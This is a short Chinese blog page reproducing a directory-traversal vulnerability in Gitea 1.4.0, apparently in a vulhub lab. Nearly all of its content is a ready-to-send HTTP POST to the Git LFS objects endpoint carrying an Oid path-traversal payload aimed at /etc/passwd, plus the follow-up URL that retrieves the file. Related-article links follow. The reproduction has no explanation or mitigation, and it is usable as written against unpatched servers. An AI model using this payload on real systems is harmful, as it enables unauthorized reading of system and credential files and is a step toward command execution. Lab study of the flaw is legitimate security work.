Gitea 1.4.0 目录穿越导致命令执行漏洞 | V2AS - 问路

Gitea 1.4.0 目录穿越导致命令执行漏洞

阅读原文时间：2023年07月09日阅读：1

复现

POST /vulhub/repo.git/info/lfs/objects HTTP/1.1

Host: 192.168.49.2:3000

Accept-Encoding: gzip, deflate

Accept: application/vnd.git-lfs+json

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 151

{

"Oid": "……/../../etc/passwd",

"Size": 1000000,

"User" : "a",

"Password" : "a",

"Repo" : "a",

"Authorization" : "a"

}

之后访问

http://192.168.49.2:3000/vulhub/repo.git/info/lfs/objects/……%2F..%2F..%2Fetc%2Fpasswd/sth

手机扫一扫

移动阅读更方便

你可能感兴趣的文章

每个后端都应该了解的OpenResty入门以及网关安全实战

Web应用防火墙--规则防护

Python潮流周刊#9：如何在本地部署开源大语言模型？

4

PHP文件包含总结

5

完全可复制、经过验证的 Go 工具链

6

细数2019-2023年CWE TOP 25 数据，看软件缺陷的防护

7

VulnStack - ATT&CK红队评估实战(四) Writeup

8

VulnStack - ATT&CK红队评估实战(一) Writeup

9

Scalpel：解构API复杂参数Fuzz的「手术刀」

10

应用程序接口（API）安全的入门指南